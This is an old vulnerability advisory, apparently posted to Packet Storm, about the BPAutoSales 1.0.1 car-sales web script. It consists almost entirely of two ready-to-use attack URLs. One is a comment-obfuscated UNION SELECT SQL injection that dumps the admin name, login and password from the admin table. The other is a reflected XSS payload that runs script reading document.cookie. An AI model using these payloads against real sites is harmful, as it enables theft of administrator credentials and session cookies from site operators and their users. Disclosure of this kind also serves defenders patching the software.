BPAutoSales 1.0.1 SQL Injection / XSS

2009-01-30T00:00:00
ID PACKETSTORM:74505
Type packetstorm
Reporter XORON
Modified 2009-01-30T00:00:00

Description

                                        
                                            `=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
=  
= XORON 2009(C)  
=  
= BPAutoSales v1.0.1 Remote SQL Injection Vuln.   
=   
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
=  
= Script: BPAutoSales, version 1.0.1  
= Price: $229  
=  
= Author: xoron  
=  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
=  
= BUGS   
=  
= Sql Injections:  
= index.php?cmd=advertise_details&category=car&aid=-1/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,name,22,password,login/**/from/**/admin/**/where/**/id=1/*  
=   
= XSS:  
= index.php?cmd=car_search&type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
=  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-   
  
  
`